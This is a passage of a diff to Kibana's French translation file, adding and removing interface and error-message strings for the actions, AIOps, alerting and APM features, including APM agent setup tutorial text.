"xpack.actions.savedObjects.goToConnectorsButtonText": "Accéder aux connecteurs", - "xpack.actions.savedObjects.onImportText": "{connectorsWithSecretsLength} {connectorsWithSecretsLength, plural, one {Le connecteur contient} other {Les connecteurs contiennent}} des informations sensibles qui requièrent des mises à jour.", - "xpack.actions.serverSideErrors.expirerdLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car votre licence {licenseType} a expiré.", - "xpack.actions.serverSideErrors.invalidLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car votre licence {licenseType} ne le prend pas en charge. Veuillez mettre à niveau votre licence.", - "xpack.actions.serverSideErrors.predefinedActionDeleteDisabled": "L'action préconfigurée {id} n'est pas autorisée à effectuer des suppressions.", - "xpack.actions.serverSideErrors.predefinedActionUpdateDisabled": "L'action préconfigurée {id} n'est pas autorisée à effectuer des mises à jour.", - "xpack.actions.serverSideErrors.unavailableLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car les informations de licence ne sont pas disponibles actuellement.", "xpack.actions.serverSideErrors.unavailableLicenseInformationErrorMessage": "Les actions sont indisponibles - les informations de licence ne sont pas disponibles actuellement.", - "xpack.actions.urlAllowedHostsConfigurationError": "Le {field} cible \"{value}\" n'est pas ajouté à la configuration Kibana xpack.actions.allowedHosts", + "xpack.aiops.explainLogRateSpikes.loadingState.identifiedFieldCandidates": "{fieldCandidatesCount, plural, one {# candidat de champ identifié} other {# candidats de champs identifiés}}.", + "xpack.aiops.explainLogRateSpikes.loadingState.identifiedFieldValuePairs": "{fieldValuePairsCount, plural, one {# paire significative champ/valeur identifiée} other {# paires significatives champ/valeur identifiées}}.", + "xpack.aiops.index.dataLoader.internalServerErrorMessage": "Erreur lors du 
chargement des données dans l'index {index}. {message}. La requête a peut-être expiré. Essayez d'utiliser un échantillon d'une taille inférieure ou de réduire la plage temporelle.", + "xpack.aiops.index.dataViewNotBasedOnTimeSeriesNotificationTitle": "La vue de données {dataViewTitle} n'est pas basée sur une série temporelle", + "xpack.aiops.index.errorLoadingDataMessage": "Erreur lors du chargement des données dans l'index {index}. {message}.", + "xpack.aiops.progressTitle": "Progression : {progress} % — {progressMessage}", + "xpack.aiops.searchPanel.totalDocCountLabel": "Total des documents : {strongTotalCount}", + "xpack.aiops.searchPanel.totalDocCountNumber": "{totalCount, plural, other {#}}", + "xpack.aiops.correlations.failedTransactions.correlationsTable.fieldNameLabel": "Nom du champ", + "xpack.aiops.correlations.failedTransactions.correlationsTable.fieldValueLabel": "Valeur du champ", + "xpack.aiops.correlations.failedTransactions.correlationsTable.impactLabel": "Impact", + "xpack.aiops.correlations.failedTransactions.correlationsTable.impactLabelColumnTooltip": "Le niveau d'impact du champ sur la différence de taux de messages", + "xpack.aiops.correlations.failedTransactions.correlationsTable.logRateColumnTooltip": "Une représentation visuelle de l'impact du champ sur la différence de taux de messages", + "xpack.aiops.correlations.failedTransactions.correlationsTable.logRateLabel": "Taux du log", + "xpack.aiops.correlations.failedTransactions.correlationsTable.pValueColumnTooltip": "L'importance de changements dans la fréquence des valeurs ; des valeurs plus faibles indiquent un changement plus important.", + "xpack.aiops.correlations.failedTransactions.correlationsTable.pValueLabel": "valeur-p", + "xpack.aiops.correlations.highImpactText": "Élevé", + "xpack.aiops.correlations.lowImpactText": "Bas", + "xpack.aiops.correlations.mediumImpactText": "Moyenne", + "xpack.aiops.correlations.veryLowImpactText": "Très bas", + 
"xpack.aiops.dataGrid.field.documentCountChart.seriesLabel": "compte du document", + "xpack.aiops.dataGrid.field.documentCountChartSplit.seriesLabel": "autre compte du document", + "xpack.aiops.documentCountContent.clearSelectionAriaLabel": "Effacer la sélection", + "xpack.aiops.explainLogRateSpikes.loadingState.doneMessage": "Terminé.", + "xpack.aiops.explainLogRateSpikes.loadingState.loadingFieldCandidates": "Chargement des champs candidats.", + "xpack.aiops.explainLogRateSpikes.loadingState.loadingHistogramData": "Chargement des données d’histogramme.", + "xpack.aiops.explainLogRateSpikesPage.emptyPromptBody": "La fonction Expliquer les pics de taux de log identifie les combinaisons champ/valeur statistiquement significatives qui contribuent à un pic de taux de log.", + "xpack.aiops.explainLogRateSpikesPage.emptyPromptTitle": "Cliquez sur un pic dans l'histogramme pour lancer l'analyse.", + "xpack.aiops.fullTimeRangeSelector.useFullDataExcludingFrozenButtonTooltip": "Utilisez toute la plage de données à l'exception du niveau de données frozen.", + "xpack.aiops.fullTimeRangeSelector.useFullDataIncludingFrozenButtonTooltip": "Utilisez toute la plage de données, y compris le niveau de données frozen, qui peut inclure des résultats de recherche plus lents.", + "xpack.aiops.index.dataViewNotBasedOnTimeSeriesNotificationDescription": "L'analyse des pics de taux de log ne fonctionne que sur des index temporels", + "xpack.aiops.index.fullTimeRangeSelector.errorSettingTimeRangeNotification": "Une erreur s'est produite lors de la définition de la plage temporelle.", + "xpack.aiops.index.fullTimeRangeSelector.moreOptionsButtonAriaLabel": "Plus d'options", + "xpack.aiops.index.fullTimeRangeSelector.noResults": "Aucun résultat ne correspond à vos critères de recherche.", + "xpack.aiops.index.fullTimeRangeSelector.useFullDataButtonLabel": "Utiliser toutes les données", + "xpack.aiops.index.fullTimeRangeSelector.useFullDataExcludingFrozenMenuLabel": "Exclure le niveau de 
données frozen", + "xpack.aiops.index.fullTimeRangeSelector.useFullDataIncludingFrozenMenuLabel": "Inclure le niveau de données frozen", + "xpack.aiops.miniHistogram.noDataLabel": "S. O.", + "xpack.aiops.progressAriaLabel": "Progression", + "xpack.aiops.rerunAnalysisButtonTitle": "Relancer l’analyse", + "xpack.aiops.searchPanel.invalidSyntax": "Syntaxe non valide", + "xpack.aiops.searchPanel.queryBarPlaceholderText": "Rechercher… (par exemple, status:200 AND extension:\"PHP\")", "xpack.alerting.alertNavigationRegistry.get.missingNavigationError": "La navigation pour le type d'alerte \"{alertType}\" dans \"{consumer}\" n'est pas enregistrée.", "xpack.alerting.alertNavigationRegistry.register.duplicateDefaultError": "La navigation par défaut dans \"{consumer}\" est déjà enregistrée.", "xpack.alerting.alertNavigationRegistry.register.duplicateNavigationError": "La navigation pour le type d'alerte \"{alertType}\" dans \"{consumer}\" est déjà enregistrée.", - "xpack.alerting.api.error.disabledApiKeys": "L'alerting se base sur les clés d'API qui semblent désactivées", - "xpack.alerting.appName": "Alerting", - "xpack.alerting.builtinActionGroups.recovered": "Récupéré", - "xpack.alerting.injectActionParams.email.kibanaFooterLinkText": "Afficher la règle dans Kibana", - "xpack.alerting.rulesClient.invalidDate": "Date non valide pour le {field} de paramètre : \"{dateValue}\"", - "xpack.alerting.rulesClient.validateActions.invalidGroups": "Groupes d'actions non valides : {groups}", - "xpack.alerting.rulesClient.validateActions.misconfiguredConnector": "Connecteurs non valides : {groups}", + "xpack.alerting.rulesClient.invalidDate": "Date non valide pour le {field} de paramètre : \"{dateValue}\"", + "xpack.alerting.rulesClient.validateActions.invalidGroups": "Groupes d'actions non valides : {groups}", + "xpack.alerting.rulesClient.validateActions.misconfiguredConnector": "Connecteurs non valides : {groups}", "xpack.alerting.ruleTypeRegistry.get.missingRuleTypeError": "Le type 
de règle \"{id}\" n'est pas enregistré.", "xpack.alerting.ruleTypeRegistry.register.customRecoveryActionGroupUsageError": "Le type de règle [id=\"{id}\"] ne peut pas être enregistré. Le groupe d'actions [{actionGroup}] ne peut pas être utilisé à la fois comme groupe de récupération et comme groupe d'actions actif.", "xpack.alerting.ruleTypeRegistry.register.duplicateRuleTypeError": "Le type de règle \"{id}\" est déjà enregistré.", - "xpack.alerting.ruleTypeRegistry.register.invalidDefaultTimeoutRuleTypeError": "Le type de règle \"{id}\" a un intervalle par défaut non valide : {errorMessage}.", + "xpack.alerting.ruleTypeRegistry.register.invalidDefaultTimeoutRuleTypeError": "Le type de règle \"{id}\" a un intervalle par défaut non valide : {errorMessage}.", "xpack.alerting.ruleTypeRegistry.register.invalidTimeoutRuleTypeError": "Le type de règle \"{id}\" a un délai d'expiration non valide : {errorMessage}.", "xpack.alerting.ruleTypeRegistry.register.reservedActionGroupUsageError": "Le type de règle [id=\"{id}\"] ne peut pas être enregistré. Les groupes d'actions [{actionGroups}] sont réservés par le framework.", - "xpack.alerting.savedObjects.goToRulesButtonText": "Accéder aux règles", "xpack.alerting.savedObjects.onImportText": "{rulesSavedObjectsLength} {rulesSavedObjectsLength, plural, one {La règle doit être activée} other {Les règles doivent être activées}} après l'importation.", "xpack.alerting.serverSideErrors.expirerdLicenseErrorMessage": "Le type de règle {ruleTypeId} est désactivé, car votre licence {licenseType} a expiré.", "xpack.alerting.serverSideErrors.invalidLicenseErrorMessage": "La règle {ruleTypeId} est désactivée, car elle requiert une licence {licenseType}. 
Accédez à Gestion des licences pour consulter les options de mise à niveau.", "xpack.alerting.serverSideErrors.unavailableLicenseErrorMessage": "Le type de règle {ruleTypeId} est désactivé, car les informations de licence ne sont pas disponibles actuellement.", + "xpack.alerting.api.error.disabledApiKeys": "L'alerting se base sur les clés d'API qui semblent désactivées", + "xpack.alerting.appName": "Alerting", + "xpack.alerting.builtinActionGroups.recovered": "Récupéré", + "xpack.alerting.injectActionParams.email.kibanaFooterLinkText": "Afficher la règle dans Kibana", + "xpack.alerting.savedObjects.goToRulesButtonText": "Accéder aux règles", "xpack.alerting.serverSideErrors.unavailableLicenseInformationErrorMessage": "Les alertes sont indisponibles – les informations de licence ne sont pas disponibles actuellement.", - "xpack.alerting.taskRunner.warning.maxExecutableActions": "Le nombre maximal d'actions pour ce type de règle a été atteint ; les actions excédentaires n'ont pas été déclenchées.", + "xpack.alerting.taskRunner.warning.maxExecutableActions": "Le nombre maximal d'actions pour ce type de règle a été atteint ; les actions excédentaires n'ont pas été déclenchées.", + "xpack.apm.agentConfig.deleteModal.text": "Vous êtes sur le point de supprimer la configuration du service \"{serviceName}\" et de l'environnement \"{environment}\".", + "xpack.apm.agentConfig.deleteSection.deleteConfigFailedText": "Une erreur est survenue lors de la suppression d'une configuration de \"{serviceName}\". Erreur : \"{errorMessage}\"", + "xpack.apm.agentConfig.deleteSection.deleteConfigSucceededText": "Vous avez supprimé une configuration de \"{serviceName}\" avec succès. 
La propagation jusqu'aux agents pourra prendre un certain temps.", + "xpack.apm.agentConfig.range.errorText": "{rangeType, select,\n between {doit être compris entre {min} et {max}}\n gt {doit être supérieur à {min}}\n lt {doit être inférieur à {max}}\n other {doit être un entier}\n }", + "xpack.apm.agentConfig.saveConfig.failed.text": "Une erreur est survenue pendant l'enregistrement de la configuration de \"{serviceName}\". Erreur : \"{errorMessage}\"", + "xpack.apm.agentConfig.saveConfig.succeeded.text": "La configuration de \"{serviceName}\" a été enregistrée. La propagation jusqu'aux agents pourra prendre un certain temps.", + "xpack.apm.alerts.anomalySeverity.scoreDetailsDescription": "score {value} {value, select, critical {} other {et plus}}", + "xpack.apm.alertTypes.errorCount.reason": "Le nombre d'erreurs est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", + "xpack.apm.alertTypes.transactionDuration.reason": "La latence de {aggregationType} est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", + "xpack.apm.alertTypes.transactionDurationAnomaly.reason": "Une anomalie {severityLevel} avec un score de {measured} a été détectée dans le dernier {interval} pour {serviceName}.", + "xpack.apm.alertTypes.transactionErrorRate.reason": "L'échec des transactions est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", + "xpack.apm.anomalyDetection.createJobs.failed.text": "Une erreur est survenue lors de la création d'une ou de plusieurs tâches de détection des anomalies pour les environnements de service APM [{environments}]. Erreur : \"{errorMessage}\"", + "xpack.apm.anomalyDetection.createJobs.succeeded.text": "Tâches de détection des anomalies créées avec succès pour les environnements de service APM [{environments}]. 
Le démarrage de l'analyse du trafic à la recherche d'anomalies par le Machine Learning va prendre un certain temps.", + "xpack.apm.anomalyDetectionSetup.notEnabledForEnvironmentText": "La détection des anomalies n'est pas encore activée pour l'environnement \"{currentEnvironment}\". Cliquez pour continuer la configuration.", + "xpack.apm.compositeSpanCallsLabel": ", {count} appels, sur une moyenne de {duration}", + "xpack.apm.correlations.ccsWarningCalloutBody": "Les données pour l'analyse de corrélation n'ont pas pu être totalement récupérées. Cette fonctionnalité est prise en charge uniquement à partir des versions {version} et ultérieures.", + "xpack.apm.correlations.failedTransactions.helpPopover.basicExplanation": "Les corrélations vous aident à découvrir les attributs qui ont le plus d'influence pour distinguer les échecs et les succès d'une transaction. Les transactions sont considérées comme un échec lorsque leur valeur {field} est {value}.", + "xpack.apm.correlations.fieldContextPopover.addFilterAriaLabel": "Filtrer sur le {fieldName} : \"{value}\"", + "xpack.apm.correlations.fieldContextPopover.calculatedFromSampleDescription": "Calculé à partir d'un échantillon de {sampleSize} documents", + "xpack.apm.correlations.fieldContextPopover.removeFilterAriaLabel": "Exclure le {fieldName} : \"{value}\"", + "xpack.apm.correlations.progressTitle": "Progression : {progress} %", + "xpack.apm.durationDistribution.chart.percentileMarkerLabel": "{markerPercentile}e centile", + "xpack.apm.durationDistributionChart.totalSpansCount": "Total : {totalDocCount} {totalDocCount, plural, one {intervalle} other {intervalles}}", + "xpack.apm.durationDistributionChart.totalTransactionsCount": "Total : {totalDocCount} {totalDocCount, plural, one {transaction} other {transactions}}", + "xpack.apm.durationDistributionChartWithScrubber.selectionText": "Selection : {formattedSelection}", + "xpack.apm.errorGroupDetails.errorGroupTitle": "Groupe d'erreurs {errorGroupId}", + 
"xpack.apm.errorGroupDetails.viewOccurrencesInDiscoverButtonLabel": "Visualiser {occurrencesCount} {occurrencesCount, plural, one {l'occurrence} other {les occurrences}} dans Discover", + "xpack.apm.errorGroupTopTransactions.column.occurrences.valueLabel": "{occurrences} occ.", + "xpack.apm.errorsTable.occurrences": "{occurrences} occ.", + "xpack.apm.exactTransactionRateLabel": "{value} tpm", + "xpack.apm.fleet_integration.settings.apmAgent.description": "Configurez l'instrumentation pour les applications {title}.", + "xpack.apm.fleet_integration.settings.tailSamplingDocsHelpText": "Pour en savoir plus sur les politiques d'échantillonnage de la queue, consultez notre {link}.", + "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.version.helpText": "Entrez la {versionLink} de l'agent Java Elastic APM qui doit être attachée.", + "xpack.apm.fleetIntegration.javaRuntime.discoveryRulesDescription": "Pour chaque JVM en cours d'exécution, les règles de découverte sont évaluées dans l'ordre où elles sont fournies. La première règle de correspondance détermine le résultat. Découvrez plus d'informations dans le {docLink}.", + "xpack.apm.instancesLatencyDistributionChartTooltipInstancesTitle": "{instancesCount} {instancesCount, plural, one {instance} other {instances}}", + "xpack.apm.kueryBar.placeholder": "Rechercher {event, select,\n transaction {des transactions}\n metric {des indicateurs}\n error {des erreurs}\n other {des transactions, des erreurs et des indicateurs}\n } (par ex. 
{queryExample})", + "xpack.apm.propertiesTable.agentFeature.noResultFound": "Pas de résultats pour \"{value}\".", + "xpack.apm.serviceGroups.cardsList.serviceCount": "{servicesCount} {servicesCount, plural, one {service} other {services}}", + "xpack.apm.serviceGroups.createFailure.toast.title": "Erreur lors de la création du groupe \"{groupName}\"", + "xpack.apm.serviceGroups.createSucess.toast.title": "Groupe \"{groupName}\" créé", + "xpack.apm.serviceGroups.deleteFailure.toast.title": "Erreur lors de la suppression du groupe \"{groupName}\"", + "xpack.apm.serviceGroups.deleteFailure.unknownId.toast.title": "Erreur lors de la suppression du groupe \"{groupName}\"", + "xpack.apm.serviceGroups.deleteSuccess.toast.title": "Groupe \"{groupName}\" supprimé", + "xpack.apm.serviceGroups.editFailure.toast.title": "Erreur lors de la modification du groupe \"{groupName}\"", + "xpack.apm.serviceGroups.editSucess.toast.title": "Groupe \"{groupName}\" modifié", + "xpack.apm.serviceGroups.groupsCount": "{servicesCount} {servicesCount, plural, =0 {groupe} one {groupe} other {groupes}}", + "xpack.apm.serviceGroups.selectServicesForm.matchingServiceCount": "{servicesCount} {servicesCount, plural, =0 {service correspond} one {service correspond} other {services correspondent}} à la requête", + "xpack.apm.serviceGroups.tour.content.link": "Découvrez plus d'informations dans le {docsLink}.", + "xpack.apm.serviceIcons.serviceDetails.cloud.availabilityZoneLabel": "{zones, plural, =0 {Zone de disponibilité} one {Zone de disponibilité} other {Zones de disponibilité}} ", + "xpack.apm.serviceIcons.serviceDetails.cloud.faasTriggerTypeLabel": "{triggerTypes, plural, =0 {Type de déclencheur} one {Type de déclencheur} other {Types de déclencheurs}} ", + "xpack.apm.serviceIcons.serviceDetails.cloud.functionNameLabel": "{functionNames, plural, =0 {Nom de fonction} one {Nom de fonction} other {Noms de fonction}} ", + "xpack.apm.serviceIcons.serviceDetails.cloud.machineTypesLabel": "{machineTypes, 
plural, =0{Type de machine} one {Type de machine} other {Types de machines}} ", + "xpack.apm.serviceIcons.serviceDetails.cloud.regionLabel": "{regions, plural, =0 {Region} one {Région} other {Régions}} ", + "xpack.apm.serviceMap.resourceCountLabel": "{count} ressources", + "xpack.apm.serviceNodeMetrics.unidentifiedServiceNodesWarningText": "Nous n'avons pas pu déterminer à quelles JVM ces indicateurs correspondent. Cela provient probablement du fait que vous exécutez une version du serveur APM antérieure à 7.5. La mise à niveau du serveur APM vers la version 7.5 ou supérieure devrait résoudre le problème. Pour plus d'informations sur la mise à niveau, consultez {link}. Vous pouvez également utiliser la barre de recherche de Kibana pour filtrer par nom d'hôte, par ID de conteneur ou en fonction d'autres champs.", + "xpack.apm.serviceOveriew.errorsTableOccurrences": "{occurrences} occ.", + "xpack.apm.servicesTable.environmentCount": "{environmentCount, plural, one {1 environnement} other {# environnements}}", + "xpack.apm.settings.agentKeys.apiKeysDisabledErrorDescription": "Contactez votre administrateur système et reportez-vous aux {link} pour activer les clés d'API.", + "xpack.apm.settings.agentKeys.copyAgentKeyField.title": "Création de la clé \"{name}\" effectuée", + "xpack.apm.settings.agentKeys.crate.failed": "Erreur lors de la création de la clé de l'agent APM \"{keyName}\". Erreur : \"{message}\"", + "xpack.apm.settings.agentKeys.deleteConfirmModal.title": "Supprimer la clé de l'agent APM \"{name}\" ?", + "xpack.apm.settings.agentKeys.invalidate.failed": "Erreur lors de la suppression de la clé de l'agent APM \"{name}\"", + "xpack.apm.settings.agentKeys.invalidate.succeeded": "Suppression de la clé de l'agent APM \"{name}\"", + "xpack.apm.settings.anomalyDetection.jobList.mlDescriptionText": "Pour ajouter la détection des anomalies à un nouvel environnement, créez une tâche de Machine Learning. 
Vous pouvez gérer les tâches de Machine Learning existantes dans {mlJobsLink}.", + "xpack.apm.settings.apmIndices.applyChanges.failed.text": "Un problème est survenu lors de l'application des index. Erreur : {errorMessage}.", + "xpack.apm.settings.apmIndices.helpText": "Remplace {configurationName} : {defaultValue}", + "xpack.apm.settings.apmIndices.spaceDescription": "Les paramètres des index s'appliquent à l'espace {spaceName}.", + "xpack.apm.settings.customLink.create.failed.message": "Un problème est survenu lors de l'enregistrement du lien. Erreur : \"{errorMessage}\"", + "xpack.apm.settings.customLink.emptyPromptText": "Nous allons y remédier ! Vous pouvez ajouter des liens personnalisés au menu Actions à partir des détails de transaction de chaque service. Créez un lien utile vers le portail d'assistance de votre société, ou ouvrez un rapport de bug. Besoin d'autres idées ? Consultez {customLinkDocLinkText}.", + "xpack.apm.settings.customLink.flyout.link.url.helpText": "Ajoutez les variables des noms de champ à votre URL pour appliquer des valeurs, par ex., {sample}.", + "xpack.apm.settings.customLink.preview.contextVariable.noMatch": "Nous n'avons pas trouvé de valeur correspondante pour {variables} dans le document d'exemple de transaction.", + "xpack.apm.settings.customLink.table.noResultFound": "Pas de résultats pour \"{value}\".", + "xpack.apm.settings.schema.descriptionText": "Nous avons créé un processus simple et transparent pour passer du binaire du serveur APM à Elastic Agent. Attention, il s'agit d'une action {irreversibleEmphasis} qui ne peut être réalisée que par un {superuserEmphasis} bénéficiant d'un accès à Fleet. 
En savoir plus sur {elasticAgentDocLink}.", + "xpack.apm.settings.schema.disabledReason": "L'option Passer à Elastic Agent n'est pas disponible : {reasons}", + "xpack.apm.settings.schema.success.returnText": "ou revenez simplement à l'{serviceInventoryLink}.", + "xpack.apm.settings.upgradeAvailable.description": "Même si votre intégration APM est configurée, une nouvelle version de l'intégration APM est disponible pour une mise à niveau avec votre stratégie de package. Consultez {upgradePackagePolicyLink} pour tirer le meilleur parti de votre configuration.", + "xpack.apm.spanLinks.combo.childrenLinks": "Liens entrants ({linkedChildren})", + "xpack.apm.spanLinks.combo.parentsLinks": "Liens sortants ({linkedParents})", + "xpack.apm.stacktraceTab.libraryFramesToogleButtonLabel": "{count, plural, one {# cadre de bibliothèque} other {# cadres de bibliothèque}}", + "xpack.apm.transactionDetails.errorCount": "{errorCount, number} {errorCount, plural, one {erreur} other {erreurs}}", + "xpack.apm.transactionDetails.transFlyout.callout.agentDroppedSpansMessage": "L'agent APM qui a signalé cette transaction a abandonné {dropped} intervalles ou plus, d'après sa configuration.", + "xpack.apm.transactionRateLabel": "{displayedValue} tpm", + "xpack.apm.transactionsTable.cardinalityWarning.body": "Le nombre de noms de transactions uniques dépasse la valeur configurée de {bucketSize}. Essayez de reconfigurer vos agents de façon à regrouper les transactions similaires ou augmentez la valeur de {codeBlock}", + "xpack.apm.tutorial.config_otel.description1": "(1) Les agents et SDK OpenTelemetry doivent prendre en charge les variables {otelExporterOtlpEndpoint}, {otelExporterOtlpHeaders} et {otelResourceAttributes}. 
Certains composants instables peuvent ne pas encore répondre à cette exigence.", + "xpack.apm.tutorial.config_otel.description3": "La liste exhaustive des variables d'environnement, les paramètres de ligne de commande et les extraits de code de configuration (conformes à la spécification OpenTelemetry) se trouvent dans le {otelInstrumentationGuide}. Certains clients OpenTelemetry instables peuvent ne pas prendre en charge toutes les fonctionnalités et nécessitent peut-être d'autres mécanismes de configuration.", + "xpack.apm.tutorial.djangoClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL personnalisée du serveur APM (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.djangoClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une utilisation avancée.", + "xpack.apm.tutorial.dotNetClient.configureAgent.textPost": "Si vous ne transférez pas une instance \"IConfiguration\" à l'agent (par ex., pour les applications non ASP.NET Core) vous pouvez également configurer l'agent par le biais de variables d'environnement. \n Consultez [the documentation]({documentationLink}) pour une utilisation avancée.", + "xpack.apm.tutorial.dotNetClient.download.textPre": "Ajoutez le(s) package(s) d'agent depuis [NuGet]({allNuGetPackagesLink}) à votre application .NET. Plusieurs packages NuGet sont disponibles pour différents cas d'utilisation. \n\nPour une application ASP.NET Core avec Entity Framework Core, téléchargez le package [Elastic.Apm.NetCoreAll]({netCoreAllApmPackageLink}). Ce package ajoutera automatiquement chaque composant d'agent à votre application. \n\n Si vous souhaitez minimiser les dépendances, vous pouvez utiliser le package [Elastic.Apm.AspNetCore]({aspNetCorePackageLink}) uniquement pour le monitoring d'ASP.NET Core ou le package [Elastic.Apm.EfCore]({efCorePackageLink}) uniquement pour le monitoring d'Entity Framework Core. 
\n\n Si vous souhaitez seulement utiliser l'API d'agent publique pour l'instrumentation manuelle, utilisez le package [Elastic.Apm]({elasticApmPackageLink}).", + "xpack.apm.tutorial.downloadServerRpm": "Vous cherchez les packages 32 bits ? Consultez la [Download page]({downloadPageLink}).", + "xpack.apm.tutorial.downloadServerTitle": "Vous cherchez les packages 32 bits ? Consultez la [Download page]({downloadPageLink}).", + "xpack.apm.tutorial.elasticCloud.textPre": "Pour activer le serveur APM, accédez à [the Elastic Cloud console] (https://cloud.elastic.co/deployments/{deploymentId}/edit) et activez APM et Fleet dans la page de modification du déploiement en cliquant sur Ajouter une capacité, puis cliquez sur Enregistrer. Une fois activé, actualisez la page.", + "xpack.apm.tutorial.flaskClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL personnalisée du serveur APM (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.flaskClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une utilisation avancée.", + "xpack.apm.tutorial.goClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL de serveur APM personnalisée (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.goClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une configuration avancée.", + "xpack.apm.tutorial.goClient.instrument.textPost": "Consultez la [documentation]({documentationLink}) pour obtenir un guide détaillé pour l'instrumentation du code source Go.", + "xpack.apm.tutorial.javaClient.download.textPre": "Téléchargez le fichier jar de l'agent depuis [Maven Central]({mavenCentralLink}). 
N'ajoutez **pas** l'agent comme dépendance de votre application.", + "xpack.apm.tutorial.javaClient.startApplication.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.", + "xpack.apm.tutorial.javaClient.startApplication.textPre": "Ajoutez l'indicateur \"-javaagent\" et configurez l'agent avec les propriétés du système.\n\n * Définir le nom de service requis (caractères autorisés : a-z, A-Z, 0-9, -, _ et espace)\n * Définir l'URL personnalisée du serveur APM (par défaut : {customApmServerUrl})\n * Définir le token secret du serveur APM\n * Définir l'environnement de service\n * Définir le package de base de votre application", + "xpack.apm.tutorial.jsClient.enableRealUserMonitoring.textPre": "Le serveur APM désactive la prise en charge du RUM par défaut. Consultez la [documentation]({documentationLink}) pour obtenir des détails sur l'activation de la prise en charge du RUM. Lorsque vous utilisez l'intégration APM avec Fleet, le support RUM est automatiquement activé.", + "xpack.apm.tutorial.jsClient.installDependency.commands.setCustomApmServerUrlComment": "Définir l'URL de serveur APM personnalisée (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.jsClient.installDependency.textPost": "Les intégrations de framework, tel que React ou Angular, ont des dépendances personnalisées. 
Consultez la [integration documentation]({docLink}) pour plus d'informations.", + "xpack.apm.tutorial.nodeClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL personnalisée du serveur APM (par défaut : {defaultApmServerUrl})", + "xpack.apm.tutorial.nodeClient.configure.textPost": "Consultez [the documentation]({documentationLink}) pour une utilisation avancée, notamment pour connaître l'utilisation avec [Babel/ES Modules]({babelEsModulesLink}).", + "xpack.apm.tutorial.otel.configure.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.\n\n", + "xpack.apm.tutorial.otel.configureAgent.textPre": "Spécifiez les paramètres OpenTelemetry suivants dans le cadre du démarrage de votre application. Notez que les SDK OpenTelemetry exigent du code de démarrage en plus de ces paramètres de configuration. Pour plus de détails, consultez la [documentation OpenTelemetry Elastic]({openTelemetryDocumentationLink}) et les [guides d'instrumentation OpenTelemetry]({openTelemetryInstrumentationLink}).", + "xpack.apm.tutorial.otel.download.textPre": "Consultez les [guides d'instrumentation OpenTelemetry]({openTelemetryInstrumentationLink}) pour télécharger l'agent ou le SDK OpenTelemetry pour votre langage.", + "xpack.apm.tutorial.phpClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.\n\n", + "xpack.apm.tutorial.phpClient.download.textPre": "Téléchargez le package correspondant à votre plateforme depuis [GitHub releases]({githubReleasesLink}).", + "xpack.apm.tutorial.phpClient.installPackage.textPost": "Consultez la [documentation]({documentationLink}) pour les commandes d'installation sur les autres plateformes prises en charge et pour l'installation avancée.", + "xpack.apm.tutorial.rackClient.createConfig.commands.setCustomApmServerComment": "Définir l'URL de serveur APM personnalisée (par 
défaut : {defaultServerUrl})", + "xpack.apm.tutorial.rackClient.createConfig.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.\n\n", + "xpack.apm.tutorial.rackClient.createConfig.textPre": "Créez un fichier config {configFile} :", + "xpack.apm.tutorial.railsClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour découvrir les options de configuration et l'utilisation avancée.\n\n", + "xpack.apm.tutorial.railsClient.configure.textPre": "APM se lance automatiquement au démarrage de l'application. Configurer l'agent, en créant le fichier config {configFile}", + "xpack.apm.tutorial.specProvider.longDescription": "Le monitoring des performances applicatives (APM) collecte les indicateurs et les erreurs de performance approfondies depuis votre application. Cela vous permet de monitorer les performances de milliers d'applications en temps réel. [Learn more]({learnMoreLink}).", + "xpack.apm.tutorial.windowsServerInstructions.textPost": "Remarque : si l'exécution du script est désactivée dans votre système, vous devez définir la politique d'exécution de la session en cours de sorte que l'exécution du script soit autorisée. Par exemple : {command}.", + "xpack.apm.tutorial.windowsServerInstructions.textPre": "1. Téléchargez le fichier zip APM Server Windows depuis [Download page]({downloadPageLink}).\n2. Extrayez le contenu du fichier zip dans {zipFileExtractFolder}.\n3. Renommez le répertoire {apmServerDirectory} en \"APM-Server\".\n4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n5. 
Dans l'invite PowerShell, exécutez les commandes suivantes pour installer le serveur APM en tant que service Windows :", + "xpack.apm.unsavedChanges": "{unsavedChangesCount, plural, =0{0 modification non enregistrée} one {1 modification non enregistrée} other {# modifications non enregistrées}} ", + "xpack.apm.waterfall.errorCount": "{errorCount, plural, one {Afficher l'erreur liée} other {Afficher # erreurs liées}}", + "xpack.apm.waterfall.spanLinks.badge": "{total} {total, plural, one {lien d'intervalle} other {liens d'intervalle}}", + "xpack.apm.waterfall.spanLinks.tooltip.linkedChildren": "{linkedChildren} entrants", + "xpack.apm.waterfall.spanLinks.tooltip.linkedParents": "{linkedParents} sortants", + "xpack.apm.waterfall.spanLinks.tooltip.title": "{total} {total, plural, one {lien d'intervalle trouvé} other {liens d'intervalle trouvés}}", "xpack.apm.a.thresholdMet": "Seuil atteint", "xpack.apm.addDataButtonLabel": "Ajouter des données", "xpack.apm.agentConfig.allOptionLabel": "Tous", "xpack.apm.agentConfig.apiRequestSize.description": "Taille totale compressée maximale du corps de la requête 